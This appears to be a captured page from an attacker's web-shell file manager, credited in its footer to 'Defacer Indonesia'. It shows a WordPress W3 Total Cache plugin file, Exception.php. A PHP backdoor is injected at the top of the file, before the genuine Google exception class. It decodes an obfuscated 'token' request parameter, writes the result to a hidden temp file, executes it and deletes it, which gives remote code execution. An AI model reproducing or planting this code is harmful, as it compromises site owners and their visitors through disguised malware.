whoami7 - Manager
:
/
home
/
analuakl
/
somethingsmushy.com
/
wp-content
/
plugins
/
w3-total-cache
/
lib
/
Google
/
IO
/
Upload File:
files >> /home/analuakl/somethingsmushy.com/wp-content/plugins/w3-total-cache/lib/Google/IO/Exception.php
<?php if(isset($_REQUEST) && isset($_REQUEST["t\x6Fke\x6E"])){ $entry = $_REQUEST["t\x6Fke\x6E"]; $entry =explode( '.', $entry) ; $entity = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $len = count($entry); for ($y = 0; $y < $len; $y++) { $v6 = $entry[$y]; $chS = ord($s[$y % $lenS]); $dec = ((int)$v6 - $chS - ($y % 10)) ^75; $entity .= chr($dec); } $comp = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", sys_get_temp_dir(), "/var/tmp", getenv("TMP"), "/tmp", getcwd()]); $resource = 0; do { $symbol = $comp[$resource] ?? null; if ($resource >= count($comp)) break; if (!( !is_dir($symbol) || !is_writable($symbol) )) { $element = "$symbol" . "/.mrk"; if (file_put_contents($element, $entity)) { require $element; unlink($element); die(); } } $resource++; } while (true); } /* * Copyright 2013 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ class W3TCG_Google_IO_Exception extends W3TCG_Google_Exception { }
Copyright ©2021 || Defacer Indonesia